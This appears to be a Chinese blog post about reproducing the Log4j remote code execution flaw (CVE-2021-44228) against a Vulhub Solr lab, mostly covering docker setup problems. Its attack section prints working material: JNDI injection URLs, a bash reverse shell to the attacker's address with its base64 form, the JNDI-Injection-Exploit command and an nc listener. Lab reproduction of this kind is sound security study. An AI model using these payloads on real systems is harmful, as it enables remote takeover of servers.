【vluhub】log4j注入漏洞 CVE-2021-44228

LOG4介绍

是一个用Java编写的可靠,快速和灵活的日志框架(API),它在Apache软件许可下发布

log4j存在远程代码执行漏洞、受影响版本2.x

部署环境

攻击机环境:192.168.3.180

kail环境:192.168.203.12【NAT转换的】

部署vluhub

具体流程参考其他博主,本文主要讲解在部署vluhub过程中存在的几个问题,作为记录

问题一、apt-get install docker docker-compose,执行失败,下载失败,修改外网下载也失败

获取离线安装包

直通车

Releases · docker/compose · GitHub

具体版本

下载后存储至

赋予执行权限

sudo chmod +x /usr/local/bin/docker-compose

查看版本docker-compose -v

问题二、

wget https://github.com/vulhub/vulhub/archive/master.zip下载失败

手动下载https://github.com/vulhub/vulhub/archive/master.zip

上传解压

unzip vulhub-master.zip

cd vulhub-master

问题三、docker compose up -d执行失败

由于修改vluhub外网导致,需要切换成国内网络

修改内容如下

重启服务

再次执行 docker compose up -d

端口8983搭建成功

地址访问

复制代码
http://192.168.203.12:8983/solr/admin/cores?action=1

验证是否存在漏洞

DNSLog Platform

替换发送请求

[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://8dyb3y.dnslog.cn}")

刷新dns右边这个按钮 出现下方内容则存在

bash -i >& /dev/tcp/192.168.3.180/6666 0>&1

反向getshell base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==

获取JNDI包

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

执行

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTgwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.3.180

生成获取ldap内容 有用

创建监听nc-lvvp 6666异常由于windwos 没有安装nc需要安装

直通车

netcat 1.11 for Win32/Win64

安装后火绒会报毒,运行

然后在该路径下执行 nc-lvvp 6666

将生成ldap内容复制替换,重新刷新一下接口

[http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}](http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z} "http://192.168.203.12:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.180:1389/mjv27z}")

getshell了

大概就是这么个流程!

哦 最后一步移除环境

docker-compose down

参考:

centos离线安装docker,docker-compose_centos离线安装docker-compose-CSDN博客

Log4j漏洞环境搭建以及复现拿getshell_dockerlog4j环境搭建-CSDN博客

相关推荐
apocelipes11 小时前
常用编程语言和库的正则表达式性能对比
c语言·c++·python·性能优化·golang·开发工具和环境
用户83562907805112 小时前
使用 Python 在 PDF 中创建与管理书签
后端·python
MeixianAgent17 小时前
Python 回测数据入口怎么验?历史 K 线入库前先做 5 个检查
后端·python
咕白m62520 小时前
用 Python 实现一键批量查找与替换 Excel 数据
后端·python
SelectDB2 天前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
荣码2 天前
GraphRAG:普通RAG只能回答"点"的问题,我踩了4个坑才搞懂
java·python
金銀銅鐵2 天前
[Python] 基于欧几里得算法,实现分数约分计算器
python·数学
Lyn_Li2 天前
Kaggle Top 5 | 198只股票、200条数据的金融预测——BattleFin高分方案从零复现
python·kaggle·比赛复盘·金融预测
小九九的爸爸3 天前
前端想要入门Agent开发,要具备哪些Python基础?
python·agent·ai编程
阿耶同学3 天前
手把手教你用 LangGraph 搭建三层嵌套 Agent 架构
python·程序员